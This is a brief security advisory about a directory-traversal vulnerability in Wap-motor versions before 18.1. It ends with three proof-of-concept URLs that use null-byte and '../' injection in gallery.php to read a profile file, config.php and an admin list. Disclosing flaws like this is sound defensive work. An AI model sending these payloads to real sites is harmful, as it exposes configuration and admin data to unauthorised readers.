source:  https://www.securityfocus.com/bid/44223/info

Wap-motor is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.

Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks.

Versions prior to Wap-motor 18.1 are vulnerable. 

http://www.example.com/gallery/gallery.php?image=%00../profil/Twost.prof%00.gif
http://www.example.com/gallery/gallery.php?image=%00../../template/config.php%00.gif
http://www.example.com/gallery/gallery.php?image=%00../datatmp/adminlist.dat%00.gif